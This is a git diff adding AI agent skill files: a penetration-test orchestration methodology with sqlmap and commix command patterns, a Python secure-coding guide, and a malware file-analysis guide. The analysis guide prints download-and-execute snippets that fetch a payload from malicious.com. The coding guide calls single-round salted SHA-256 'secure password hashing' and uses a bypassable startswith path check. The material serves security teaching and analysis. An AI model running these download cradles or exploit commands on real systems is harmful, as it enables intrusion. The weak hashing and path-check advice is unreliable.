+      - trigger: "File upload found"
+        action: "Test webshell upload and execution"
+      - trigger: "No vulns on primary target"
+        action: "Expand to API endpoints, mobile API, staging environments"
+```
+
+### Phase 4: Reporting
+
+```yaml
+report_generation:
+  sections:
+    executive_summary:
+      - "Overall risk rating"
+      - "Key findings (top 5)"
+      - "Business impact summary"
+      - "Remediation priority"
+
+    technical_findings:
+      per_finding:
+        - "Title and severity"
+        - "CVSS score"
+        - "MITRE ATT&CK mapping"
+        - "Description and impact"
+        - "Proof of concept (HTTP request/response)"
+        - "Remediation recommendation"
+        - "Validation status (confidence score)"
+        - "Chain membership (if part of attack chain)"
+
+    attack_chains:
+      per_chain:
+        - "Chain name and impact"
+        - "Step-by-step attack path"
+        - "Chain breaker recommendations"
+
+    methodology:
+      - "Tools used"
+      - "Testing timeline"
+      - "Scope coverage map"
+      - "Limitations and caveats"
+```
+
+## Adaptive Strategy Engine
+
+### Dead Endpoint Detection
+
+Stop wasting time on endpoints that don't yield results:
+
+```python
+class DeadEndpointDetector:
+    """
+    Track endpoint testing history.
+    Mark endpoints as 'dead' if N consecutive tests yield nothing.
+    """
+
+    CONSECUTIVE_FAIL_THRESHOLD = 10
+
+    def should_continue_testing(self, endpoint):
+        history = self.get_history(endpoint)
+
+        # Count consecutive tests with no findings
+        consecutive_failures = 0
+        for test in reversed(history):
+            if test.found_something:
+                break
+            consecutive_failures += 1
+
+        if consecutive_failures >= self.CONSECUTIVE_FAIL_THRESHOLD:
+            return False  # Move on to other endpoints
+
+        return True
+```
+
+### Diminishing Returns Detection
+
+```python
+class DiminishingReturnsDetector:
+    """
+    Track finding rate over time.
+    If rate drops below threshold, suggest scope expansion or wrap-up.
+    """
+
+    def check_rate(self, findings_timeline):
+        # Findings per hour in last 2 hours
+        recent_rate = self.calc_rate(findings_timeline, hours=2)
+        # Findings per hour overall
+        overall_rate = self.calc_rate(findings_timeline, hours=None)
+
+        if recent_rate < overall_rate * 0.1:  # <10% of average
+            return {
+                "status": "diminishing_returns",
+                "suggestion": "Consider expanding scope or moving to reporting",
+                "recent_rate": recent_rate,
+                "overall_rate": overall_rate,
+            }
+
+        return {"status": "productive", "rate": recent_rate}
+```
+
+### Priority Recomputation
+
+Dynamically reorder testing priorities based on discoveries:
+
+```yaml
+priority_rules:
+  - condition: "New subdomain discovered"
+    action: "Add to recon queue (high priority)"
+
+  - condition: "Admin panel found"
+    action: "Move to top of testing queue"
+
+  - condition: "API endpoint with no authentication"
+    action: "Immediate deep testing"
+
+  - condition: "Cloud metadata accessible via SSRF"
+    action: "CRITICAL - pause other testing, exploit this chain"
+
+  - condition: "WAF blocking all payloads"
+    action: "Deprioritize blocked endpoints, try bypass techniques"
+
+  - condition: "Rate limited by target"
+    action: "Reduce request rate, rotate to different endpoints"
+```
+
+## Coverage Tracking
+
+Ensure comprehensive testing across all attack surface areas:
+
+```yaml
+coverage_matrix:
+  authentication:
+    - login_bruteforce: "tested | not_tested | not_applicable"
+    - session_management: "tested | not_tested"
+    - password_reset: "tested | not_tested"
+    - mfa_bypass: "tested | not_tested"
+    - oauth_flows: "tested | not_tested"
+
+  authorization:
+    - idor_all_endpoints: "tested | not_tested"
+    - privilege_escalation: "tested | not_tested"
+    - function_level_access: "tested | not_tested"
+
+  injection:
+    - sqli_all_params: "tested | not_tested"
+    - xss_all_inputs: "tested | not_tested"
+    - command_injection: "tested | not_tested"
+    - ssti: "tested | not_tested"
+
+  business_logic:
+    - race_conditions: "tested | not_tested"
+    - workflow_bypass: "tested | not_tested"
+    - price_manipulation: "tested | not_tested"
+
+  infrastructure:
+    - port_scan: "tested | not_tested"
+    - ssl_tls_config: "tested | not_tested"
+    - header_security: "tested | not_tested"
+    - cors_config: "tested | not_tested"
+```
+
+## Tool Integration Reference
+
+### Recon Phase Tools
+
+| Tool | Purpose | Command Pattern |
+|------|---------|-----------------|
+| **subfinder** | Subdomain enum | `subfinder -d target.com -o subs.txt` |
+| **httpx** | HTTP probing | `httpx -l subs.txt -sc -cl -ct -title -o alive.txt` |
+| **katana** | Web crawling | `katana -u https://target.com -d 3 -o endpoints.txt` |
+| **naabu** | Port scanning | `naabu -host target.com -top-ports 1000 -o ports.txt` |
+| **whatweb** | Tech detection | `whatweb https://target.com` |
+
+### Scanning Phase Tools
+
+| Tool | Purpose | Command Pattern |
+|------|---------|-----------------|
+| **nuclei** | Vuln scanning | `nuclei -l alive.txt -t cves,exposures -o vulns.txt` |
+| **ffuf** | Dir bruteforce | `ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302,403` |
+| **sqlmap** | SQLi testing | `sqlmap -u "https://target.com/page?id=1" --batch --level 3` |
+| **nikto** | Web server scan | `nikto -h https://target.com` |
+| **wafw00f** | WAF detection | `wafw00f https://target.com` |
+
+### Exploitation Phase Tools
+
+| Tool | Purpose | Command Pattern |
+|------|---------|-----------------|
+| **sqlmap** | SQLi exploit | `sqlmap -u URL --dbs --batch` |
+| **commix** | Command inj. | `commix --url="https://target.com/page?cmd=test"` |
+| **tplmap** | SSTI exploit | `tplmap -u "https://target.com/page?name=test"` |
+
+## Quality Checklist
+
+- [ ] Scope clearly defined with in-scope and out-of-scope assets
+- [ ] Rules of engagement documented and followed
+- [ ] All three streams running with shared finding state
+- [ ] Recon findings feeding into testing and tool streams
+- [ ] Validation pipeline active for all findings (ai-pentesting-validation)
+- [ ] Chain analysis performed on validated findings
+- [ ] Dead endpoints detected and deprioritized
+- [ ] Coverage matrix shows all areas tested
+- [ ] Rate limits respected throughout engagement
+- [ ] Report generated with executive and technical sections
+- [ ] All findings have proof-of-concept evidence
+- [ ] Remediation recommendations are actionable
+
+## Integration Points
+
+- **ai-pentesting-validation** - Core validation pipeline for all findings
+- **exploit-chain-patterns** - Chain analysis during Phase 3
+- **waf-detection-bypass** - WAF handling during Phase 2
+- **detection-engineer** - Generate detection rules from findings
+- **malware-report-writer** - Report format and structure guidelines

--- a/skills/pentest-orchestrator/SKILL.md
+++ b/skills/pentest-orchestrator/SKILL.md
@@ -1,7 +1,10 @@
 ---
 name: pentest-orchestrator
-description: AI-driven penetration testing orchestration methodology for structuring autonomous or semi-autonomous security assessments. Use when planning multi-phase pentests, coordinating recon/scanning/exploitation workflows, implementing parallel testing streams, and adapting strategy mid-engagement based on findings.
-category: red-team
+description: "Orchestrate multi-phase penetration tests with AI. Trigger: planning pentests, coordinating recon/scanning/exploitation, or adapting strategy mid-engagement."
+license: Apache-2.0
+metadata:
+  author: gentleman-programming
+  version: "1.0"
 ---
 
 # Pentest Orchestrator
@@ -447,3 +450,13 @@ coverage_matrix:
 - **waf-detection-bypass** - WAF handling during Phase 2
 - **detection-engineer** - Generate detection rules from findings
 - **malware-report-writer** - Report format and structure guidelines
+
+## Validation
+
+To verify this skill works correctly:
+
+1. **Load test**: Confirm the skill loads in a supported agent (Claude Code, OpenCode, Cursor) without frontmatter parsing errors.
+2. **Structure test**: Verify all engagement phases (0-4) render correctly with proper YAML code blocks.
+3. **Integration test**: Confirm referenced skills (ai-pentesting-validation, exploit-chain-patterns, waf-detection-bypass) exist and are loadable.
+4. **Coverage test**: Validate the coverage matrix YAML parses correctly and all categories are present.
+5. **Tool reference test**: Verify all tool command patterns in the reference tables are syntactically correct.

--- a/skills/python-security/SKILL.md
+++ b/skills/python-security/SKILL.md
@@ -1,0 +1,315 @@
+---
+name: python-security
+description: Secure Python patterns and best practices for defensive coding. Use when writing Python code for security tools, implementing input validation, handling cryptographic operations, or building secure network applications.
+category: blue-team
+---
+
+# Python Security
+
+Secure Python patterns, input validation, cryptographic best practices, and defensive coding for security tools and applications.
+
+## When to Use This Skill
+
+Use this skill when you need to:
+- Write secure Python code for security tools and automation
+- Implement input validation and sanitization
+- Handle cryptographic operations safely
+- Build secure network applications and APIs
+- Prevent common Python security vulnerabilities (injection, path traversal, etc.)
+- Use security-focused Python libraries correctly
+
+## Core Security Libraries
+
+### Cryptography
+
+```python
+from cryptography.fernet import Fernet
+from cryptography.hazmat.primitives import hashes
+from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
+import secrets
+
+# Generate secure random token
+def generate_token(length=32):
+    """Generate cryptographically secure token"""
+    return secrets.token_urlsafe(length)
+
+# Generate secure random password
+def generate_password(length=16):
+    """Generate secure random password"""
+    import string
+    alphabet = string.ascii_letters + string.digits + string.punctuation
+    return ''.join(secrets.choice(alphabet) for _ in range(length))
+
+# Symmetric encryption with Fernet
+def encrypt_data(data, key):
+    """Encrypt data using Fernet symmetric encryption"""
+    f = Fernet(key)
+    return f.encrypt(data.encode())
+
+def decrypt_data(encrypted_data, key):
+    """Decrypt data"""
+    f = Fernet(key)
+    return f.decrypt(encrypted_data).decode()
+
+# Generate encryption key
+key = Fernet.generate_key()
+```
+
+### Secure Hashing
+
+```python
+import hashlib
+import hmac
+
+# Secure password hashing
+def hash_password(password: str) -> str:
+    """Hash password with salt using SHA-256"""
+    salt = secrets.token_hex(16)
+    hashed = hashlib.sha256((salt + password).encode()).hexdigest()
+    return f"{salt}${hashed}"
+
+def verify_password(stored: str, provided: str) -> bool:
+    """Verify password against stored hash"""
+    salt, hashed = stored.split('$')
+    return hmac.compare_digest(
+        hashlib.sha256((salt + provided).encode()).hexdigest(),
+        hashed
+    )
+
+# HMAC for message authentication
+def create_hmac(message: str, key: bytes) -> str:
+    """Create HMAC signature"""
+    return hmac.new(key, message.encode(), hashlib.sha256).hexdigest()
+```
+
+## Input Validation & Sanitization
+
+### IP Address Validation
+
+```python
+import re
+import ipaddress
+
+def validate_ip(ip: str) -> bool:
+    """Validate IP address using ipaddress module"""
+    try:
+        ipaddress.ip_address(ip)
+        return True
+    except ValueError:
+        return False
+
+def is_private_ip(ip: str) -> bool:
+    """Check if IP is private/internal"""
+    try:
+        return ipaddress.ip_address(ip).is_private
+    except ValueError:
+        return False
+```
+
+### Input Sanitization
+
+```python
+import html
+import re
+
+def sanitize_html_input(user_input: str) -> str:
+    """Escape HTML to prevent XSS"""
+    return html.escape(user_input)
+
+def sanitize_filename(filename: str) -> str:
+    """Sanitize filename to prevent path traversal"""
+    # Remove path separators and dangerous characters
+    sanitized = re.sub(r'[\\/:\*\?"<>\|]', '', filename)
+    # Remove leading/trailing whitespace and dots
+    sanitized = sanitized.strip('. ')
+    return sanitized or 'unnamed'
+
+def validate_url(url: str, allowed_domains: list) -> bool:
+    """Validate URL against allowlist to prevent SSRF"""
+    from urllib.parse import urlparse
+    parsed = urlparse(url)
+    return parsed.hostname in allowed_domains
+```
+
+### SQL Injection Prevention
+
+```python
+import sqlite3
+
+# SECURE: Parameterized queries
+def get_user(db: sqlite3.Connection, user_id: int):
+    """Secure parameterized query"""
+    cursor = db.execute("SELECT * FROM users WHERE id = ?", (user_id,))
+    return cursor.fetchone()
+
+# NEVER DO THIS:
+# cursor.execute(f"SELECT * FROM users WHERE id = {user_id}")
+```
+
+## Network Security
+
+### Secure HTTP Requests
+
+```python
+import requests
+from requests.adapters import HTTPAdapter
+from urllib3.util.ssl_ import create_urllib3_context
+
+def create_secure_session() -> requests.Session:
+    """Create a session with TLS verification"""
+    session = requests.Session()
+    adapter = HTTPAdapter()
+    session.mount('https://', adapter)
+    return session
+
+def secure_get(url: str, timeout: int = 10) -> requests.Response:
+    """Make secure HTTP GET request"""
+    response = requests.get(url, timeout=timeout, verify=True)
+    response.raise_for_status()
+    return response
+```
+
+### Secure Socket Programming
+
+```python
+import socket
+import ssl
+
+def create_tls_socket(host: str, port: int) -> ssl.SSLSocket:
+    """Create a TLS-secured socket"""
+    context = ssl.create_default_context()
+    context.check_hostname = True
+    context.verify_mode = ssl.CERT_REQUIRED
+
+    sock = socket.create_connection((host, port))
+    secure_sock = context.wrap_socket(sock, server_hostname=host)
+    return secure_sock
+```
+
+## Common Security Testing Patterns
+
+### Port Scanning (Ethical Use Only)
+
+```python
+import socket
+
+def scan_port(host: str, port: int, timeout: float = 1.0) -> bool:
+    """Scan single port"""
+    try:
+        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+        sock.settimeout(timeout)
+        result = sock.connect_ex((host, port))
+        sock.close()
+        return result == 0
+    except socket.error:
+        return False
+
+def scan_ports(host: str, ports: list) -> list:
+    """Scan multiple ports"""
+    return [port for port in ports if scan_port(host, port)]
+```
+
+### Banner Grabbing
+
+```python
+import socket
+
+def grab_banner(host: str, port: int, timeout: float = 2.0) -> str | None:
+    """Grab service banner"""
+    try:
+        sock = socket.socket()
+        sock.settimeout(timeout)
+        sock.connect((host, port))
+        banner = sock.recv(1024).decode().strip()
+        sock.close()
+        return banner
+    except (socket.error, UnicodeDecodeError):
+        return None
+```
+
+## Security Best Practices
+
+### Never Hardcode Secrets
+
+```python
+# BAD: Hardcoded credentials
+API_KEY = "sk-1234567890abcdef"
+DB_PASSWORD = "supersecret"
+
+# GOOD: Use environment variables
+import os
+API_KEY = os.environ.get("API_KEY")
+DB_PASSWORD = os.environ.get("DB_PASSWORD")
+```
+
+### Use Secure Temp Files
+
+```python
+import tempfile
+
+# GOOD: Secure temporary file
+with tempfile.NamedTemporaryFile(delete=True, mode='w') as f:
+    f.write("sensitive data")
+    f.flush()
+    # File is automatically deleted on close
+```
+
+### Avoid eval/exec
+
+```python
+# NEVER DO THIS:
+# result = eval(user_input)
+# exec(user_input)
+
+# GOOD: Use safe alternatives
+import ast
+import json
+
+# Parse JSON safely
+data = json.loads(user_input)
+
+# Parse Python literals safely
+result = ast.literal_eval(user_input)
+```
+
+### Secure File Operations
+
+```python
+import os
+
+def safe_file_read(filepath: str, allowed_dir: str) -> str:
+    """Read file safely, preventing path traversal"""
+    real_path = os.path.realpath(filepath)
+    real_allowed = os.path.realpath(allowed_dir)
+
+    if not real_path.startswith(real_allowed):
+        raise ValueError(f"Access denied: {filepath} is outside allowed directory")
+
+    with open(real_path, 'r') as f:
+        return f.read()
+```
+
+## Ethical Security Guidelines
+
+1. **Authorization**: ALWAYS get written permission before testing
+2. **Scope**: Stay within defined boundaries
+3. **Documentation**: Log all activities
+4. **Responsible Disclosure**: Report vulnerabilities properly
+5. **No Harm**: Never cause damage or disruption
+
+## Installation
+
+```bash
+# Core security libraries
+pip install cryptography requests
+
+# Optional: for advanced security testing
+pip install scapy impacket paramiko
+```
+
+## References
+
+- [OWASP Python Security Cheatsheet](https://cheatsheetseries.owasp.org/cheatsheets/Python_Security_Cheatsheet.html)
+- [Python Security Best Practices](https://python.readthedocs.io/en/stable/library/security_warnings.html)
+- [Cryptography Documentation](https://cryptography.io/en/latest/)
+- [Secrets Module](https://docs.python.org/3/library/secrets.html)

--- a/skills/python-security/SKILL.md
+++ b/skills/python-security/SKILL.md
@@ -1,7 +1,10 @@
 ---
 name: python-security
-description: Secure Python patterns and best practices for defensive coding. Use when writing Python code for security tools, implementing input validation, handling cryptographic operations, or building secure network applications.
-category: blue-team
+description: "Secure Python patterns for defensive coding. Trigger: writing security tools, implementing input validation, handling crypto, or building secure network apps."
+license: Apache-2.0
+metadata:
+  author: gentleman-programming
+  version: "1.0"
 ---
 
 # Python Security
@@ -313,3 +316,13 @@ pip install scapy impacket paramiko
 - [Python Security Best Practices](https://python.readthedocs.io/en/stable/library/security_warnings.html)
 - [Cryptography Documentation](https://cryptography.io/en/latest/)
 - [Secrets Module](https://docs.python.org/3/library/secrets.html)
+
+## Validation
+
+To verify this skill works correctly:
+
+1. **Load test**: Confirm the skill loads without frontmatter parsing errors.
+2. **Code test**: Execute all Python code examples to verify they run without errors (cryptography, hashlib, ipaddress, html, requests, ssl, socket, tempfile, ast, json modules).
+3. **Security test**: Verify the "NEVER DO THIS" examples are clearly marked as insecure and the "GOOD" alternatives are correct.
+4. **Import test**: Confirm all import statements reference standard or correctly-named third-party libraries.
+5. **Best practices test**: Validate that all code examples follow current Python security recommendations (no eval/exec, parameterized queries, TLS verification).

--- a/skills/specialized-file-analyzer/SKILL.md
+++ b/skills/specialized-file-analyzer/SKILL.md
@@ -1,7 +1,10 @@
 ---
 name: specialized-file-analyzer
-description: Analyze specialized file types beyond standard PE executables - .NET assemblies, Office macros, PDFs, PowerShell scripts, JavaScript, archives, and Linux ELF binaries. Use when you encounter documents, scripts, or non-Windows executables that require format-specific analysis tools and techniques.
-category: soc
+description: "Analyze non-PE file types in malware campaigns. Trigger: analyzing .NET assemblies, Office macros, PDFs, scripts, archives, or Linux ELF binaries."
+license: Apache-2.0
+metadata:
+  author: gentleman-programming
+  version: "1.0"
 ---
 
 # Specialized File Analyzer
@@ -500,3 +503,13 @@ Each file type contributes specific sections to the malware analysis report:
 6. Extract download URLs and IOCs
 7. Document payload delivery method
 8. Prepare findings for report
+
+## Validation
+
+To verify this skill works correctly:
+
+1. **Load test**: Confirm the skill loads without frontmatter parsing errors.
+2. **File type test**: Verify all 8 file type sections (.NET, Office, PDF, Scripts, Archives, LNK, ELF, Batch) have analysis checklists.
+3. **Tool test**: Check that all referenced tools (dnSpy, oledump.py, pdfid.py, pdf-parser.py, olevba, readelf, strace) have correct command examples.
+4. **Checklist test**: Validate each file type's analysis checklist has appropriate items for that format.
+5. **Integration test**: Confirm referenced skills (malware-triage, malware-report-writer) exist.

--- a/skills/specialized-file-analyzer/SKILL.md
+++ b/skills/specialized-file-analyzer/SKILL.md
@@ -1,0 +1,502 @@
+---
+name: specialized-file-analyzer
+description: Analyze specialized file types beyond standard PE executables - .NET assemblies, Office macros, PDFs, PowerShell scripts, JavaScript, archives, and Linux ELF binaries. Use when you encounter documents, scripts, or non-Windows executables that require format-specific analysis tools and techniques.
+category: soc
+---
+
+# Specialized File Analyzer
+
+Expert analysis of non-PE file formats commonly used in malware campaigns: .NET, Office documents, PDFs, scripts, archives, and Linux binaries.
+
+## When to Use This Skill
+
+Use this skill when analyzing:
+- **.NET/C# assemblies** (.exe, .dll with .NET framework)
+- **Office documents** with macros (.docm, .xlsm, .doc, .xls)
+- **PDF files** (suspicious attachments, exploit documents)
+- **Scripts** (PowerShell .ps1, VBScript .vbs, JavaScript .js)
+- **Archives** (.zip, .rar, .7z, .tar.gz)
+- **Shortcuts** (.lnk files)
+- **Linux binaries** (ELF executables)
+- **Batch files** (.bat, .cmd)
+
+**Key indicator:** `file` command shows non-PE32 executable or document type.
+
+## Quick File Type Identification
+
+```bash
+# Identify file type
+file sample.bin
+
+# Common outputs:
+# "PE32+ console executable, for MS Windows" → Standard PE (use malware-triage)
+# "PE32 executable (GUI) Intel 80386 Mono/.Net assembly" → .NET (use this skill)
+# "Microsoft Office Document" → Office macro (use this skill)
+# "PDF document, version 1.7" → PDF (use this skill)
+# "Zip archive data" → Archive (use this skill)
+# "ELF 64-bit LSB executable" → Linux binary (use this skill)
+# "ASCII text, with CRLF line terminators" → Script (use this skill)
+```
+
+---
+
+## .NET / C# Assembly Analysis
+
+### Detection
+```bash
+# Check for .NET assembly
+file sample.exe | grep "Mono/.Net assembly"
+
+# Or check strings
+strings sample.exe | grep "mscoree.dll"
+```
+
+### Tool: dnSpy (Windows - Primary Tool)
+
+**Download:** https://github.com/dnSpy/dnSpy
+
+**Workflow:**
+1. Open sample.exe in dnSpy
+2. Navigate: Assembly Explorer → sample.exe → Namespace → Classes
+3. Find entry point: Right-click assembly → Go to Entry Point
+
+**What to Look For:**
+
+**Main() Function:**
+```csharp
+// Entry point - start here
+public static void Main(string[] args)
+{
+    // Analyze execution flow
+}
+```
+
+**Suspicious Namespaces:**
+- `System.Net` - Network operations (WebClient, HttpClient)
+- `System.Security.Cryptography` - Encryption/decryption
+- `System.Reflection` - Dynamic code loading
+- `System.Diagnostics.Process` - Process execution
+- `System.IO` - File operations
+- `Microsoft.Win32` - Registry access
+
+**Common Malicious Patterns:**
+```csharp
+// Download and execute
+WebClient wc = new WebClient();
+wc.DownloadFile("http://malicious.com/payload.exe", "C:\\temp\\payload.exe");
+Process.Start("C:\\temp\\payload.exe");
+
+// Base64 decode embedded payload
+byte[] decoded = Convert.FromBase64String(encodedPayload);
+
+// Reflective loading
+Assembly.Load(byte[] rawAssembly);
+```
+
+**Extract Embedded Resources:**
+```
+Assembly Explorer → Right-click assembly → Resources
+Look for:
+- Embedded executables (byte arrays)
+- Encrypted payloads
+- Configuration data
+- Icons (may hide data)
+
+Right-click resource → Save
+```
+
+**Deobfuscation:**
+```bash
+# Using de4dot (automated deobfuscator)
+de4dot sample.exe -o sample_deobfuscated.exe
+```
+
+### Tool: ILSpy (Cross-platform Alternative)
+
+```bash
+# Command-line decompilation
+ilspycmd sample.exe -o output_directory/
+```
+
+### Analysis Checklist - .NET
+
+- [ ] Entry point identified (Main function)
+- [ ] Obfuscation detected and removed (if needed)
+- [ ] Embedded resources extracted
+- [ ] Network URLs/IPs extracted
+- [ ] Crypto keys identified
+- [ ] Anti-analysis checks found
+- [ ] Payload execution method documented
+- [ ] IOCs extracted (URLs, IPs, file paths)
+
+---
+
+## Office Document / Macro Analysis
+
+### Detection
+```bash
+# Macro-enabled formats
+# .docm, .xlsm, .pptm → Office 2007+ with macros
+# .doc, .xls, .ppt → Legacy Office (97-2003) with macros
+
+file document.docm
+
+# Quick macro check
+strings document.docm | grep -i "vba\|macro\|autoopen"
+```
+
+### Tool: oledump.py (Primary - Didier Stevens)
+
+**Workflow:**
+
+**1. List Streams:**
+```bash
+python oledump.py document.docm
+
+# Example output:
+#  1:       114 '\x01CompObj'
+#  2:      4096 '\x05DocumentSummaryInformation'
+#  3: M    8192 'Macros/VBA/ThisDocument'  ← Macro present (M indicator)
+#  4: m    1024 'Macros/VBA/_VBA_PROJECT'
+#  5: M    4096 'Macros/VBA/Module1'
+```
+
+**2. Extract Macro Code:**
+```bash
+# Extract macro from stream 3
+python oledump.py -s 3 -v document.docm
+
+# Save to file
+python oledump.py -s 3 -v document.docm > extracted_macro.vba
+```
+
+**3. Analyze Macro Code:**
+
+Look for **Auto-Execution Functions:**
+```vba
+Sub AutoOpen()          ' Word - runs on document open
+Sub Document_Open()     ' Word - runs on document open
+Sub Workbook_Open()     ' Excel - runs on workbook open
+Sub Auto_Open()         ' Excel - runs on workbook open
+```
+
+Look for **Suspicious VBA Functions:**
+```vba
+' Command execution
+Shell("cmd.exe /c powershell ...")
+CreateObject("WScript.Shell").Run "..."
+
+' File download
+CreateObject("MSXML2.XMLHTTP")
+URLDownloadToFile ...
+
+' File system operations
+CreateObject("Scripting.FileSystemObject")
+```
+
+### Tool: olevba (oletools Suite)
+
+**Installation:**
+```bash
+pip install oletools
+```
+
+**Automated Analysis:**
+```bash
+# Comprehensive analysis
+olevba document.docm
+
+# Decode obfuscated strings
+olevba --decode document.docm
+```
+
+**Output Interpretation:**
+- **AutoExec** - Auto-execution keywords found
+- **Suspicious** - Suspicious VBA keywords
+- **IOCs** - URLs, IPs, file paths
+- **Hex Strings** - Encoded data
+- **Base64 Strings** - Encoded payloads
+
+### Analysis Checklist - Office Documents
+
+- [ ] Macro presence confirmed
+- [ ] All macro streams extracted
+- [ ] Auto-execution functions identified
+- [ ] Obfuscated strings decoded
+- [ ] Download URLs extracted
+- [ ] Payload execution method documented
+- [ ] External template checked (.docx/.xlsx)
+- [ ] Embedded objects analyzed
+- [ ] IOCs extracted and defanged
+
+---
+
+## PDF Analysis
+
+### Detection
+```bash
+file document.pdf
+```
+
+### Tool: pdfid.py (Didier Stevens)
+
+**Quick Triage:**
+```bash
+python pdfid.py document.pdf
+
+# Red flags:
+# /OpenAction   - Executes action on open
+# /AA           - Additional actions (auto-execute)
+# /JavaScript   - Embedded JavaScript
+# /JS           - JavaScript (short form)
+# /Launch       - Launch external program
+# /EmbeddedFile - Embedded files
+# /RichMedia    - Flash/multimedia content
+```
+
+### Tool: pdf-parser.py (Didier Stevens)
+
+**Extract JavaScript:**
+```bash
+# Search for JavaScript objects
+python pdf-parser.py --search javascript document.pdf
+
+# Extract specific object
+python pdf-parser.py --object 15 document.pdf
+
+# Dump JavaScript code
+python pdf-parser.py --object 15 --raw document.pdf > extracted_js.txt
+```
+
+### Analysis Checklist - PDF
+
+- [ ] pdfid scan completed (flags identified)
+- [ ] JavaScript extracted (if present)
+- [ ] Embedded files extracted
+- [ ] Auto-action mechanism documented
+- [ ] Shellcode indicators checked
+- [ ] URLs/IPs extracted from JS
+- [ ] IOCs documented
+
+---
+
+## PowerShell / Script Analysis
+
+### PowerShell (.ps1) Deobfuscation
+
+**Common Obfuscation Patterns:**
+
+**Base64 Encoding:**
+```powershell
+# Encoded command execution
+powershell.exe -EncodedCommand <base64_string>
+```
+
+**Suspicious PowerShell Patterns:**
+- `Invoke-Expression` / `IEX` - Execute string as code
+- `Invoke-WebRequest` / `Invoke-RestMethod` - Download content
+- `DownloadString` / `DownloadFile` - Download payloads
+- `FromBase64String` - Decode embedded payload
+- `IO.Compression.GzipStream` - Decompress payload
+- `Reflection.Assembly]::Load` - Load assembly from memory
+- `-EncodedCommand` - Base64 encoded command
+- `-WindowStyle Hidden` - Hide window
+- `-ExecutionPolicy Bypass` - Bypass script execution policy
+
+### VBScript (.vbs) Analysis
+
+```vbs
+' Common malicious patterns:
+
+' Command execution
+CreateObject("WScript.Shell").Run "cmd.exe /c ..."
+
+' HTTP download
+Set objHTTP = CreateObject("MSXML2.XMLHTTP")
+objHTTP.Open "GET", "http://malicious.com/payload.exe", False
+objHTTP.Send
+```
+
+### JavaScript (.js) Analysis
+
+```bash
+# Beautify obfuscated JS
+cat malicious.js | js-beautify > beautified.js
+```
+
+**Suspicious Patterns:**
+```javascript
+// Code execution
+eval(encodedCode);
+
+// ActiveX (Windows COM objects)
+var shell = new ActiveXObject("WScript.Shell");
+shell.Run("cmd.exe /c ...");
+```
+
+### Analysis Checklist - Scripts
+
+- [ ] Script type identified (PS1, VBS, JS, BAT)
+- [ ] Obfuscation detected and removed
+- [ ] Base64/encoded strings decoded
+- [ ] Download URLs extracted
+- [ ] Execution commands documented
+- [ ] Dropped file paths identified
+- [ ] IOCs extracted (URLs, IPs, domains)
+
+---
+
+## Archive Analysis
+
+### Safe Inspection (No Extraction)
+
+```bash
+# List contents without extracting
+7z l archive.zip
+unzip -l archive.zip
+tar -tzf archive.tar.gz
+
+# Look for red flags:
+# - Double extensions (invoice.pdf.exe)
+# - Executable files (.exe, .scr, .com, .bat, .vbs)
+# - LNK files (shortcuts)
+# - Deeply nested archives
+```
+
+### LNK (Shortcut) File Analysis
+
+**Manual Strings Analysis:**
+```bash
+strings malicious.lnk | grep -E "\.exe|\.dll|http|powershell|cmd"
+```
+
+### Analysis Checklist - Archives
+
+- [ ] Contents listed without extraction
+- [ ] File extensions verified (no double extensions)
+- [ ] Files extracted to isolated directory
+- [ ] All extracted files typed (file command)
+- [ ] LNK files analyzed (if present)
+- [ ] Nested archives checked
+- [ ] Password documented (if applicable)
+
+---
+
+## Linux / ELF Binary Analysis
+
+### Detection
+```bash
+file sample.bin
+# Output: "ELF 64-bit LSB executable, x86-64"
+```
+
+### Static Analysis
+
+**ELF Header:**
+```bash
+readelf -h sample.bin
+```
+
+**Imported Libraries:**
+```bash
+ldd sample.bin
+```
+
+**Imported Symbols:**
+```bash
+nm -D sample.bin
+objdump -T sample.bin
+
+# Search for suspicious functions:
+nm -D sample.bin | grep -E "socket|connect|fork|exec|ptrace|system"
+```
+
+**Strings:**
+```bash
+strings -a sample.bin | grep -E "http|/tmp|/etc|passwd"
+```
+
+### Dynamic Analysis (Linux)
+
+**strace - System Call Monitoring:**
+```bash
+# Monitor all system calls
+strace -f ./sample.bin 2>&1 | tee strace_output.txt
+
+# Network operations only
+strace -e trace=socket,connect,send,recv ./sample.bin
+```
+
+### Analysis Checklist - ELF
+
+- [ ] Architecture identified (x86/x64/ARM)
+- [ ] Imported libraries documented
+- [ ] Suspicious functions identified
+- [ ] Packing detected and removed (if UPX)
+- [ ] Strings extracted and analyzed
+- [ ] System calls monitored (strace)
+- [ ] Network activity captured
+- [ ] File operations documented
+
+---
+
+## Integration with Report Writing
+
+Each file type contributes specific sections to the malware analysis report:
+
+**.NET Analysis** → Decompiled code snippets, embedded resource descriptions
+**Office Macros** → Macro code (sanitized), auto-execution methods, download URLs
+**PDF Analysis** → Embedded JavaScript, auto-action triggers, exploit CVEs
+**Scripts** → Deobfuscated code, execution flow, download cradles
+**Archives/LNK** → Archive structure, masquerading techniques, LNK target analysis
+**ELF Binaries** → System calls used, network protocols, persistence mechanisms
+
+---
+
+## Tool Quick Reference
+
+| File Type | Primary Tool | Secondary Tool |
+|-----------|--------------|----------------|
+| **.NET** | dnSpy | ILSpy, de4dot |
+| **Office Macros** | oledump.py | olevba, XLMMacroDeobfuscator |
+| **PDF** | pdfid.py, pdf-parser.py | peepdf |
+| **PowerShell** | PSDecode | Manual analysis |
+| **VBScript/JS** | Text editor + analysis | js-beautify |
+| **Archives** | 7z, unzip, tar | - |
+| **LNK** | LECmd (Win), lnkinfo (Linux) | strings |
+| **ELF** | readelf, nm, objdump | strace, ltrace |
+
+---
+
+## Best Practices
+
+**Do:**
+- Always identify file type first (`file` command)
+- Extract in isolated environments
+- Document obfuscation techniques
+- Save original and deobfuscated versions
+- Test extracted IOCs for accuracy
+- Cross-reference with VirusTotal/MalwareBazaar
+
+**Don't:**
+- Execute scripts without understanding them first
+- Trust file extensions (check magic bytes)
+- Skip deobfuscation steps
+- Extract archives directly to important directories
+- Assume password-protected = safe
+
+---
+
+## Example Usage
+
+**User request:** "I have a suspicious .docm file with macros, help me analyze it"
+
+**Workflow:**
+1. Confirm file type (Office document)
+2. Use oledump.py to list streams
+3. Extract VBA macro code
+4. Identify auto-execution functions
+5. Decode obfuscated strings
+6. Extract download URLs and IOCs
+7. Document payload delivery method
+8. Prepare findings for report

--- a/skills/waf-detection-bypass/SKILL.md
+++ b/skills/waf-detection-bypass/SKILL.md
@@ -1,7 +1,10 @@
 ---
